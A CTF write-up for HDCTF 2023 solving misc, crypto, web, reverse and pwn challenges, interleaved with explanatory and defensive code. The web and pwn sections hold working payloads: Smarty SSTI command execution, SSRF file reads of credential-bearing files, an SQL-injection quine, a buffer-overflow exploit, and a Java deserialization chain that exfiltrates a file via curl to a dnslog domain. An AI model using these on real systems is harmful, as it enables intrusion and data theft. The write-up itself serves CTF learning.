HDCTF 2023 writeup

Warning
This post was last updated on 2023-04-23; its contents may be out of date.

RANK: 14

https://file.shenghuo2.top/typecho/202304222212128.png


https://file.shenghuo2.top/typecho/202304222211157.png

MISC

hardMisc

zsteg pulls out the hidden data.

Base64-decode it:

https://file.shenghuo2.top/typecho/202304221930259.png

HDCTF{wE1c0w3_10_HDctf_M15c}

ExtremeMisc

A standard archive-chain challenge.

A zip is carved from the tail of IDAT.png.

Next comes Dic.zip; the name says to brute-force it with a dictionary.

rockyou.txt did the job.

https://file.shenghuo2.top/typecho/202304221938972.png

Next, Reverse.piz: the two hex digits of every byte have been swapped (the nibbles are reversed), so swap them back:

# Reverse.piz is the archive with the two hex digits of every byte swapped;
# swapping them back (0xAB -> 0xBA) yields a valid zip
data = open('Reverse.piz', 'rb').read()
fixed = bytes(int(('%02x' % b)[::-1], 16) for b in data)
with open('reverse.zip', 'wb') as f:
    f.write(fixed)

Then brute-force its password:

https://file.shenghuo2.top/typecho/202304222022099.png

Then a known-plaintext attack.

ARCHPR was too slow for me, so I ran it with bkcrack.

https://file.shenghuo2.top/typecho/202304222024780.png
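The ExtremeMisc chain above boils down to two moves: carve a zip that was appended to another file, and undo a byte-level transform (here the nibble swap) until the blob is a readable zip. The following is an added example written for this writeup, not the challenge's own code, and it generalises the nibble swap into a small table of candidate transforms tried in turn; the sample PNG-like blob and the zip inside it are constructed inline.

```python
import io
import zipfile
from typing import Optional, Tuple

ZIP_MAGIC = b"PK\x03\x04"


def swap_nibbles(data: bytes) -> bytes:
    """Undo the Reverse.piz trick: swap the two hex digits of every byte (0xAB -> 0xBA)."""
    return bytes(((b & 0x0F) << 4) | (b >> 4) for b in data)


# Byte-level transforms archive puzzles commonly apply to a blob; each one is its own inverse.
TRANSFORMS = {
    "identity": lambda d: d,
    "swap_nibbles": swap_nibbles,
    "reverse_bytes": lambda d: d[::-1],
}


def is_zip(data: bytes) -> bool:
    return data.startswith(ZIP_MAGIC) and zipfile.is_zipfile(io.BytesIO(data))


def carve_zip(blob: bytes) -> Optional[bytes]:
    """Cut the blob at the first local-file header, e.g. a zip appended after a PNG's IEND."""
    idx = blob.find(ZIP_MAGIC)
    return None if idx < 0 else blob[idx:]


def detect_transform(blob: bytes) -> Optional[str]:
    """Name of the first transform whose output is a readable zip, or None."""
    for name, fn in TRANSFORMS.items():
        if is_zip(fn(blob)):
            return name
    return None


def recover_zip(blob: bytes) -> Optional[bytes]:
    """Carve if the zip is embedded as-is; otherwise undo a recognised transform."""
    carved = carve_zip(blob)
    if carved is not None and is_zip(carved):
        return carved
    name = detect_transform(blob)
    return None if name is None else TRANSFORMS[name](blob)


def read_member(zip_bytes: bytes, name: str) -> str:
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.read(name).decode()


def build_samples() -> Tuple[bytes, bytes]:
    """Constructed inputs (not challenge files): a PNG-like prefix with a zip appended,
    and the same zip with every byte's nibbles swapped, as in Reverse.piz."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "HDCTF{constructed_sample}")
    zip_bytes = buf.getvalue()
    png_like = b"\x89PNG\r\n\x1a\n" + b"\x00" * 40 + b"IEND"
    return png_like + zip_bytes, swap_nibbles(zip_bytes)


if __name__ == "__main__":
    png_blob, piz_blob = build_samples()
    print(detect_transform(piz_blob))                          # swap_nibbles
    print(read_member(recover_zip(png_blob), "flag.txt"))     # HDCTF{constructed_sample}
```

Carving by the local-file-header magic is enough here because the zip is the last thing in the file; if something follows it, `zipfile` will still find the central directory but a stricter tool may complain about trailing data.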

MasterMisc

A password-protected multi-volume archive.

Newer Bandizip versions ship a built-in password recovery; I used that.

https://file.shenghuo2.top/typecho/202304222026891.png

The flag comes in three parts.

Appended after topic.png there is a second PNG, followed by a WAV.

The third flag segment sits between the second PNG and the WAV.

https://file.shenghuo2.top/typecho/202304222031609.png

The second image's height has been tampered with; restoring the height reveals the second flag.

https://file.shenghuo2.top/typecho/202304222032613.png
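Two recurring steps in MasterMisc are locating files glued together by their magic bytes and fixing a PNG whose IHDR height was shrunk. Editing the height by hand in a hex editor leaves a stale CRC, which strict viewers reject; the added example below (written for this writeup, not the challenge's code) rewrites the height and recomputes the IHDR CRC, and scans a blob for PNG/WAV/zip headers. The PNG, the WAV header and the text between them are constructed inline.

```python
import struct
import zlib
from typing import List, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MAGICS = {"png": PNG_SIG, "wav": b"RIFF", "zip": b"PK\x03\x04"}


def find_embedded(blob: bytes) -> List[Tuple[int, str]]:
    """Offsets of every file-magic occurrence in the blob, sorted by position.
    A RIFF hit only counts as WAV when 'WAVE' follows at offset 8."""
    hits = []
    for kind, magic in MAGICS.items():
        start = 0
        while (idx := blob.find(magic, start)) != -1:
            if kind != "wav" or blob[idx + 8:idx + 12] == b"WAVE":
                hits.append((idx, kind))
            start = idx + 1
    return sorted(hits)


def png_size(png: bytes) -> Tuple[int, int]:
    """Width and height from IHDR: signature(8) length(4) 'IHDR'(4) width(4) height(4)."""
    return struct.unpack(">II", png[16:24])


def ihdr_crc_ok(png: bytes) -> bool:
    """The IHDR CRC covers the chunk type plus its 13 data bytes (offsets 12..28)."""
    stored = struct.unpack(">I", png[29:33])[0]
    return stored == zlib.crc32(png[12:29])


def set_png_height(png: bytes, height: int) -> bytes:
    """Rewrite the IHDR height and recompute the CRC, as when restoring a cropped image."""
    data = bytearray(png[16:29])
    data[4:8] = struct.pack(">I", height)
    crc = zlib.crc32(b"IHDR" + bytes(data))
    return png[:16] + bytes(data) + struct.pack(">I", crc) + png[33:]


def build_png(width: int, height: int) -> bytes:
    """Constructed sample: a minimal 8-bit grayscale PNG (not a file from the challenge)."""
    def chunk(kind: bytes, data: bytes) -> bytes:
        return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", zlib.crc32(kind + data))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x7f" * width for _ in range(height))  # filter byte 0 per scanline
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def build_blob() -> Tuple[bytes, bytes]:
    """Constructed layout mirroring the challenge: a PNG whose height was cut down,
    a text segment after it, then a WAV header. Returns (blob, the uncut PNG)."""
    full = build_png(4, 3)
    cut = set_png_height(full, 1)
    wav = b"RIFF" + struct.pack("<I", 4) + b"WAVE"
    return b"topic".ljust(16, b"\x00") + cut + b"NSSCTF{constructed_part3}" + wav, full


if __name__ == "__main__":
    blob, full = build_blob()
    for offset, kind in find_embedded(blob):
        print(f"{kind} at offset {offset}")
    cut = set_png_height(full, 1)
    print(png_size(cut), ihdr_crc_ok(cut))       # (4, 1) True
    print(set_png_height(cut, 3) == full)        # True
```

Restoring the height only makes the pixels visible again if the IDAT data for the hidden rows is still in the file, which is the usual CTF setup; if the image was genuinely re-encoded at the smaller size there is nothing to recover.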

The first flag is the strangest one.

https://file.shenghuo2.top/typecho/202304222034224.png

NSSCTF{e67d8104

NSSCTF{e67d8104-7536-4433-bfff-96759901c405}

Normal_Rsa

The flag was left right there in the challenge file, never removed.

https://file.shenghuo2.top/typecho/202304222038252.png

CRYPTO

Normal_Rsa

The challenge author forgot to delete the flag.

https://file.shenghuo2.top/typecho/202304222150394.png

Normal_Rsa(revenge)

from Crypto.Util.number import long_to_bytes
import libnum

P = 8760210374362848654680470219309962250697808334943036049450523139299289451311563307524647192830909610600414977679146980314602124963105772780782771611415961
Q = 112922164039059900199889201785103245191294292153751065719557417134111270255457254419542226991791126571932603494783040069250074265447784962930254787907978286600866688977261723388531394128477338117384319760669476853506179783674957791710109694089037373611516089267817074863685247440204926676748540110584172821401
n = 12260605124589736699896772236316146708681543140877060257859757789407603137409427771651536724218984023652680193208019939451539427781667333168267801603484921516526297136507792965087544395912271944257535087877112172195116066600141520444466165090654943192437314974202605817650874838887065260835145310202223862370942385079960284761150198033810408432423049423155161537072427702512211122538749
c = 7072137651389218220368861685871400051412849006784353415843217734634414633151439071501997728907026771187082554241548140511778339825678295970901188560688120351732774013575439738988314665372544333857252548895896968938603508567509519521067106462947341820462381584577074292318137318996958312889307024181925808817792124688476198837079551204388055776209441429996815747449815546163371300963785

# n is a product of three primes. The hints P and Q are derived from p and q:
# take their integer square roots and gcd with n to recover the factors.
p_ = libnum.nroot(P, 2)
q_ = libnum.nroot(Q, 2)

p = libnum.gcd(p_, n)
q = libnum.gcd(q_, n)
r = n // p // q                      # the remaining factor
e = 65537
phi = (p - 1) * (q - 1) * (r - 1)    # Euler's totient for a three-prime modulus
d = libnum.invmod(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))

# b'HDCTF{08c66aa2-f8ea-49a2-a84f-ab9c7999ebb2}'

爬过小山去看云

"Hill" (小山) points at the Hill cipher.

"Cloud" (云) points at the cloud-shadow cipher (云影密码).

https://file.shenghuo2.top/typecho/202304222040624.png

Replace eight, four, two, one, zero with 8, 4, 2, 1, 0.

Cloud-shadow cipher: the 0s separate letters, and each letter is the sum of the 8/4/2/1 digits in its group, indexed into A-Z (1 = A).

def de_code(c):
    # A..Z, so a group summing to k decodes to the k-th letter
    dic = [chr(i) for i in range(ord("A"), ord("Z") + 1)]
    flag = []
    for group in c.split("0"):      # 0 is the separator between letters
        if not group:               # skip empty groups from leading/doubled zeros
            continue
        total = sum(int(d) for d in group)
        flag.append(dic[total - 1])
    return flag


c = "842084210884024084010124"
print("".join(de_code(c)))

# NOTFLAG

I almost thought I had got it wrong.

NSSCTF{NOTFLAG}

web

Welcome To HDCTF 2023

The page source leads to game.js,

which contains this snippet:

https://file.shenghuo2.top/typecho/202304222146342.png

Run it in the browser console and the flag appears.

https://file.shenghuo2.top/typecho/202304222146313.png

SearchMaster

The challenge asks you to POST a `data` parameter.

Whatever you send is rendered straight into the page.


Sending `{` triggers an error, and the error message reveals

https://file.shenghuo2.top/typecho/202304222146258.png

Smarty. So this is most likely Smarty SSTI: the data is compiled as template source and sent to the client.

The {if} tag is enough:

{if phpinfo()}{/if}

which executes phpinfo().

From there, straight to command execution:

data={if system('cat /f*')}{/if}

https://file.shenghuo2.top/typecho/202304222146378.png
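The reason `{if system('cat /f*')}{/if}` works is that the request body ends up as Smarty template source, and `{if ...}` compiles to a PHP expression, so any function named inside it runs. The following is an added illustration written for this writeup, not the SearchMaster source (which is not shown on the page); it assumes Smarty 3 or 4 installed via Composer and contrasts the exploitable pattern with two fixes.

```php
<?php
// Added example, not the challenge's code. Assumes Smarty 3/4 via Composer.
require 'vendor/autoload.php';

$smarty = new Smarty();
$data = $_POST['data'] ?? '';

// VULNERABLE: user input becomes template *source*, so {if system('id')}{/if}
// is compiled into PHP and executed.
// $smarty->display('string:' . $data);

// FIX 1: the template text is fixed; the input only ever travels as a variable
// and is escaped on output. {if ...} in $data is now just text.
$smarty->assign('data', $data);
$smarty->display('string:Search result: {$data|escape:"html"}');

// FIX 2 (defence in depth): if templates really must be built from input, turn on
// Smarty's security policy so the template language cannot reach into PHP.
$policy = new Smarty_Security($smarty);
$policy->php_functions = null;   // null = no PHP functions callable from {if}/{$x|...};
$policy->php_modifiers = null;   // note an empty array would mean "unrestricted"
$policy->static_classes = 'none';
$smarty->enableSecurity($policy);
```

Fix 1 is the one to ship: with the security policy alone, a mistake in the allow-lists reopens the hole, and older Smarty 3 releases had policy bypasses.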

YamiYami

Three links; click "read somethings" and look at the URL:

https://file.shenghuo2.top/typecho/202304222146421.png

This looks like SSRF, so try a local file read:

?url=file:///etc/passwd

https://file.shenghuo2.top/typecho/202304222146428.png

It reads, but the flag file cannot be read directly, so try the process environment instead:

?url=file:///proc/1/environ

https://file.shenghuo2.top/typecho/202304222146878.png

The flag is sitting in the environment variables.
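The YamiYami bug is a fetcher that passes a user-supplied URL to the HTTP library unchecked, so `file://` (and, with some libraries, `gopher://` or `dict://`) works as well as `http://`, and `/proc/1/environ` leaks the secrets the container was started with. The check below is an added example written for this writeup, not the challenge's fix; it shows the minimum a "read this URL" endpoint should enforce before fetching. The URLs in the test are constructed.

```python
import ipaddress
import re
from typing import Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# decimal (2130706433), hex (0x7f000001) and dotted-octal spellings of an IP
NUMERIC_HOST = re.compile(r"^(0x[0-9a-f]+|[0-9.]+)$", re.IGNORECASE)


def host_is_public(host: str) -> bool:
    """Literal IPs must be globally routable; IP spellings that urlsplit does not
    parse as addresses are rejected outright instead of being sent to DNS."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return not NUMERIC_HOST.match(host)


def check_fetch_url(url: str) -> Tuple[bool, str]:
    """Policy for a 'read this URL for me' endpoint. Returns (allowed, reason)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"      # file://, gopher://, dict://, ...
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"                  # http://allowed.example@127.0.0.1/
    if host == "localhost" or host.endswith(".localhost"):
        return False, "loopback host"
    if not host_is_public(host):
        return False, f"host {host!r} is not a public address"
    return True, "ok"


if __name__ == "__main__":
    for u in ("file:///proc/1/environ", "http://169.254.169.254/latest/meta-data/",
              "http://2130706433/", "https://example.com/articles/1"):
        print(u, check_fetch_url(u))
```

This check runs on the string only. A hostname that passes still has to be resolved, and the resolved address re-checked at connect time (DNS rebinding), and the HTTP client must not follow redirects into a `file://` or private-address target.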

LoginMaster

dirsearch turns up /robots.txt, which leaks this part of the source:

// checkSql() bans spaces, '=', comparison operators, 'and', 'in' and the usual
// error-based and time-based functions; the login then compares the fetched
// password with the submitted one using ===
function checkSql($s)
{
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}
if ($row['password'] === $password) {
        die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
}

So build an SQL quine: a UNION whose selected value is the injected string itself, then submit that same string as the password so the === check passes.

https://www.cnblogs.com/aninock/p/16467716.html

1'UNION(SELECT(REPLACE(REPLACE('1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#',CHAR(34),CHAR(39)),CHAR(37),'1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#')))#
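The payload is easier to trust once you see how the two REPLACE() calls expand it: the inner one turns every `"` in the template into `'`, the outer one substitutes the template for every `%`, and the result is exactly the string that was injected. The added example below (written for this writeup, not part of the original post) reproduces that expansion in Python, runs the smuggled SELECT through SQLite, whose REPLACE and CHAR behave like MySQL's for this expression, and checks the payload against a transcription of the challenge's blocklist, which is why the quine avoids spaces and `=`.

```python
import re
import sqlite3

# The checkSql() filter from the challenge, transcribed as a Python regex.
BLOCKLIST = re.compile(
    r"regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\$|0x|sleep| ",
    re.IGNORECASE,
)

# Template: every " becomes ' and every % becomes the template itself.
TEMPLATE = '1"UNION(SELECT(REPLACE(REPLACE("%",CHAR(34),CHAR(39)),CHAR(37),"%")))#'


def passes_filter(s: str) -> bool:
    return BLOCKLIST.search(s) is None


def build_payload(template: str = TEMPLATE) -> str:
    """Expand the template the way the SQL REPLACE() calls will; the output is the quine."""
    return template.replace('"', "'").replace("%", template)


def evaluate_union_expr(payload: str) -> str:
    """Run the SELECT that the injected username smuggles in and return the UNION row.
    SQLite's REPLACE()/CHAR() give the same result as MySQL for this expression."""
    prefix, suffix = "1'UNION(", ")#"
    if not (payload.startswith(prefix) and payload.endswith(suffix)):
        raise ValueError("payload is not in the 1'UNION(...)# shape")
    select = payload[len(prefix):-len(suffix)]
    return sqlite3.connect(":memory:").execute(select).fetchone()[0]


if __name__ == "__main__":
    payload = build_payload()
    print(payload)
    print("filter ok:", passes_filter(payload))
    print("quine ok:", evaluate_union_expr(payload) == payload)
```

Submit `build_payload()` as both username and password: the UNION row's password column is the payload, so `$row['password'] === $password` holds without knowing any real credential.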

JavaMonster

JWT

Change admin to Boogipop, regenerate the JWT and send it in the cookie: a=1;b=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2ODIxNzcxMTgsImlhdCI6MTY4MjE2OTkxOCwidXNlcm5hbWUiOiJCb29naXBvcCJ9.1dfoUuPRgwflPRL8beAumUMOCVFIRCV4yAjXd18Syko

// Regenerate the token with the challenge's own JwtUtil (User and JwtUtil come from the challenge code)
public static void main(String[] args) throws UnsupportedEncodingException {
    com.ctf.easyjava.utils.JwtUtil jwtUtil = new com.ctf.easyjava.utils.JwtUtil();
    User user = new User("Boogipop", "123");
    String token = jwtUtil.JwtCreate(user);
    System.out.println(token);
    System.out.println(jwtUtil.Jwttoken(token));   // parse it back to confirm it verifies
}

hashCode

"USy to solve EasyJava" has the same Java hashCode() as "Try to solve EasyJava".
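The collision is not luck: Java's String.hashCode() is h = 31*h + c over the characters, so replacing a pair (a, b) with (a+1, b-31) leaves the hash unchanged, which is exactly "Tr" -> "US". The added example below (written for this writeup, not part of the original post) reimplements hashCode() and the pair rewrite, so any equality check that compares hashCode() instead of equals() can be satisfied with a different string.

```python
def java_hash(s: str) -> int:
    """Java String.hashCode(): h = 31*h + c over UTF-16 code units, wrapped to a signed 32-bit int.
    Assumption: input stays within the BMP, so one Python char == one UTF-16 unit."""
    h = 0
    for ch in s:
        h = (31 * h + ord(ch)) & 0xFFFFFFFF
    return h - (1 << 32) if h & 0x80000000 else h


def collide_prefix(s: str) -> str:
    """A different string with the same hashCode(): rewrite the first two characters
    (a, b) -> (a + 1, b - 31), since 31*(a+1) + (b-31) == 31*a + b."""
    if len(s) < 2:
        raise ValueError("need at least two characters to rewrite")
    a, b = ord(s[0]), ord(s[1])
    return chr(a + 1) + chr(b - 31) + s[2:]


def same_hash_different_string(target: str) -> bool:
    other = collide_prefix(target)
    return other != target and java_hash(other) == java_hash(target)


if __name__ == "__main__":
    t = "Try to solve EasyJava"
    print(collide_prefix(t), java_hash(t), java_hash(collide_prefix(t)))
```

The rewrite can be applied to any adjacent pair, not just the first one, and chaining it over several pairs gives many distinct colliding strings when one of them needs to pass another filter as well.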

ROME second-order deserialization

Exfiltrate the command output through dnslog.

package com.ctf.easyjava;

import com.ctf.easyjava.hdctf.HDCTF;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;

import javax.xml.transform.Templates;
import java.util.HashMap;
// setFieldValue() and run() are helpers from the author's own Tool class (not shown here)
import static com.ctf.easyjava.Tool.*;

public class R_SignedObject {
    public static void main(String[] args) throws Exception{
        // Build a class whose static initializer runs the command; TemplatesImpl will load it
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("i");
        CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = ctClass.makeClassInitializer();
        // read the flag line by line and leak each line as a DNS label to the dnslog domain
        constructor.setBody("Runtime.getRuntime().exec(new String[]{\"/bin/sh\", \"-c\", \"cat /flag_is_is_here | while read line; do echo $line.4m7ytd.dnslog.cn | xargs curl; done\"});");
        byte[] bytes = ctClass.toBytecode();
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{bytes});
        setFieldValue(obj, "_name", "Poria");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // First ROME chain: HashMap -> EqualsBean.hashCode -> TemplatesImpl getter -> newTransformer
        HashMap table1 = getPayload(Templates.class, obj);

        // Wrap it in the challenge's HDCTF class so it is deserialized a second time
        HDCTF hdctf = new HDCTF(table1);

        // Second ROME chain around the wrapper
        HashMap table2 = getPayload(HDCTF.class, hdctf);

        run(table2, "debug", "object");
    }
    public static HashMap getPayload (Class clazz, Object payloadObj) throws Exception{
        // Two maps with the same keys in different insertion order force HashMap to call
        // EqualsBean.equals/hashCode on deserialization, which invokes the getters of payloadObj
        EqualsBean bean = new EqualsBean(String.class, "r");
        HashMap map1 = new HashMap();
        HashMap map2 = new HashMap();
        map1.put("yy", bean);
        map1.put("zZ", payloadObj);
        map2.put("zZ", bean);
        map2.put("yy", payloadObj);
        HashMap table = new HashMap();
        table.put(map1, "1");
        table.put(map2, "2");
        setFieldValue(bean, "_beanClass", clazz);
        setFieldValue(bean, "_obj", payloadObj);
        return table;
    }
}

https://file.shenghuo2.top/typecho/202304222146919.png

REVERSE

easy_re

Unpack the UPX packer first.

https://file.shenghuo2.top/typecho/202304222044918.png

SERDVEZ7WTB1X2hAdjJfL1wvXEA1N2VyM2RfN2hlX3IzdjNyczN9

Obviously base64.

Decoding gives the flag:
HDCTF{Y0u_h@v2_/\/\@57er3d_7he_r3v3rs3}

easy_asm

https://file.shenghuo2.top/typecho/202304222047366.png

This is the data segment.

https://file.shenghuo2.top/typecho/202304222047352.png

The key part is:

 mov     cl, 10h
 xor     al, cl

Each byte is XORed with 0x10.

https://file.shenghuo2.top/typecho/202304222048416.png

HDCTF{Just_a_e3sy_aSm}

fake_game

Extract the exe with pyinstxtractor.

I used this fork; it fixes up the pyc headers automatically, so there is nothing to patch by hand:

https://github.com/pyinstxtractor/pyinstxtractor-ng

Decompile the pyc with uncompyle6.

https://file.shenghuo2.top/typecho/202304222051920.png

The key function:

Solve the equations with Sage.

https://file.shenghuo2.top/typecho/202304222052549.png

With xorr[3] = 2360 the recovered flag is wrong:

HDCUF{G1Od_ql2y2r_f1r_Pwz!!|

So work backwards instead: the flag must start with HDCT, which pins down each key element, including xorr[3]:

print(flag[0] ^ ord('H'))   # xorr[0]
print(flag[1] ^ ord('D'))   # xorr[1]
print(flag[2] ^ ord('C'))   # xorr[2]
print(flag[3] ^ ord('T'))   # xorr[3]

That gives xorr[3] = 2361.

xorr = [178940, 248, 56890, 2361]
flag = [178868, 188, 56953, 2413, 178874, 131, 56957, 2313, 178867, 156, 56933, 2377, 178832, 202, 56899, 2314, 178830, 167, 56924, 2313, 178830, 167, 56938, 2383, 178822, 217, 56859, 2372 ]

# each value is XORed with the key element at position i % 4
ans = [v ^ xorr[i % 4] for i, v in enumerate(flag)]

print("".join(chr(i) for i in ans))

# HDCTF{G0Od_pl2y3r_f0r_Pvz!!}

买了些什么呢

Submit the flag in NSSCTF{} form: the item numbers in ascending order, separated by spaces, e.g. NSSCTF{1 2 3 40}.

hint: [HDCTF 2023] 买了些什么呢: item indices start at 0

https://file.shenghuo2.top/typecho/202304222056788.png

https://file.shenghuo2.top/typecho/202304222056809.png

I just handed it to Claude.

n = 40
capacity = 50

weights = [2, 5, 10, 9, 3, 6, 2, 2, 6, 8, 2, 3, 3, 2, 9, 8,
          2, 10, 8, 6, 4, 3, 4, 2, 4, 8, 3, 8, 4, 10, 7, 1,
          9, 1, 5, 7, 1, 1, 7, 4, 3]
values = [8, 1, 5, 9, 5, 6, 8, 2, 3, 7, 5, 4, 3, 7, 6, 7,
          9, 3, 10, 5, 2, 4, 5, 2, 9, 5, 8, 10, 2, 9, 6, 3,
          7, 3, 9, 6, 10, 1, 2, 9, 4]

# 0/1 knapsack: dp[i][j] is the best value using the first i items within capacity j
# (only the first n entries of weights/values are used)
dp = [[0] * (capacity + 1) for _ in range(n + 1)]

for i in range(1, n + 1):
    for j in range(capacity + 1):
        if weights[i - 1] <= j:
            dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - weights[i - 1]] + values[i - 1])
        else:
            dp[i][j] = dp[i - 1][j]

# walk the table backwards: item i was taken iff it changed the optimum at that capacity
result = []
j = capacity
for i in range(n, 0, -1):
    if dp[i][j] != dp[i - 1][j]:
        result.append(i)
        j -= weights[i - 1]

print(result[::-1])

Result (1-based item numbers):

[1, 5, 7, 11, 12, 14, 17, 19, 22, 23, 25, 27, 32, 34, 35, 37, 40]

Adjust per the hint (indices start at 0):

print(' '.join(str(i - 1) for i in result[::-1]))

NSSCTF{0 4 6 10 11 13 16 18 21 22 24 26 31 33 34 36 39}

PWN

pwnner

from pwn import *
from ctypes import *
context.log_level = 'debug'
# shorthand helpers
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

# p = process('./pwnner')
p = remote('node6.anna.nssctf.cn', 28922)
# the binary seeds rand() with a fixed value, so the "random" name it expects
# can be reproduced by calling the same libc with the same seed
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

libc.srand(0x39)
v0 = libc.rand()

sla(b'name:\n', str(v0).encode())
# 64-byte buffer + 8 bytes of saved rbp, then overwrite the return address with 0x4008B2
pl = b'a' * (64 + 8) + p64(0x4008B2)
sla(b'next?', pl)

p.interactive()

https://file.shenghuo2.top/typecho/202304222130065.png
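The exploit above leans on ctypes and a local glibc to reproduce rand() after srand(0x39). When the attacking box is not Linux, or its libc differs, the same sequence can be computed without loading any library. The added example below (written for this writeup, not part of the original exploit) is a port of glibc's TYPE_3 additive generator from random_r.c; it assumes the target binary links glibc, which the exploit already assumes, and handles seeds in 0 <= seed < 2**31.

```python
from typing import List

MODULUS = 2147483647      # 2^31 - 1, modulus of the seeding LCG
MULTIPLIER = 16807


def glibc_rand_sequence(seed: int, count: int) -> List[int]:
    """Values glibc's rand() returns after srand(seed), for 0 <= seed < 2**31.
    Assumption: the target uses glibc; other libcs use different generators."""
    if not 0 <= seed < 2 ** 31:
        raise ValueError("seed outside the range this port handles")
    r = [seed if seed else 1]                        # srand(0) behaves like srand(1)
    for i in range(1, 31):                            # 30 steps of the Park-Miller LCG
        r.append((MULTIPLIER * r[i - 1]) % MODULUS)
    for i in range(31, 34):
        r.append(r[i - 31])
    for i in range(34, 344):                          # glibc discards 310 outputs while seeding
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
    out = []
    for i in range(344, 344 + count):
        r.append((r[i - 31] + r[i - 3]) & 0xFFFFFFFF)
        out.append(r[i] >> 1)                         # rand() returns the top 31 bits
    return out


def expected_name(seed: int = 0x39) -> str:
    """What pwnner expects as the name: the first rand() after srand(0x39), as a decimal string."""
    return str(glibc_rand_sequence(seed, 1)[0])


if __name__ == "__main__":
    print(glibc_rand_sequence(1, 3))   # [1804289383, 846930886, 1681692777]
    print(expected_name())
```

In the exploit, `sla(b'name:\n', expected_name().encode())` replaces the ctypes calls; if the binary instead seeds from time(NULL), pass the current epoch second (and a small window around it) to the same function.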
